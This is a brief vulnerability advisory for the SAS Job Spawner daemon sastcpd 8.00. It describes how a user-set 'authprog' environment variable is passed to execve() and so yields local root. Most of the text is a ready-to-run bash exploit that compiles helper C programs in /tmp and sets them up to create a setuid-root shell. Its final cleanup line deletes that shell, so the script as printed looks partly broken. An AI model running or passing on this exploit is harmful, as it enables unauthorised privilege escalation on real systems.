COMMAND

sastcpd trusts variables, which leads to a local root exploit

SYSTEMS AFFECTED

SAS Job Spawner for Open Systems version 8.00

PROBLEM

The daemon passes a user-defined environment variable, 'authprog',
to execve(). This is a problem if sastcpd is setuid, because the
invoking user then chooses the program that runs with the daemon's
privileges.

Exploit
=======

#!/bin/bash
# sastcpd 8.0 'authprog' vulnerability.
# rpc <rpc@unholy.net> || <h@ckz.org>
# Thanks sharefuzz!

cat <<EOT >/tmp/hesh.c
int main(void) {
    setuid(0);
    setgid(0);
    execl("/bin/ksh", "ksh", (char *)0);
}
EOT

cat <<EOT >/tmp/heh.c
int main(void) {
    setuid(0);
    setgid(0);
    system("chown 0:0 /tmp/hesh");
    system("chmod 4755 /tmp/hesh");
    return 0;
}
EOT

gcc -o /tmp/heh /tmp/heh.c
gcc -o /tmp/hesh /tmp/hesh.c
export authprog=/tmp/heh
/path/to/sas/utilities/bin/sastcpd
sleep 1
rm /tmp/he*.c
rm /tmp/heh /tmp/hesh

SOLUTION

None yet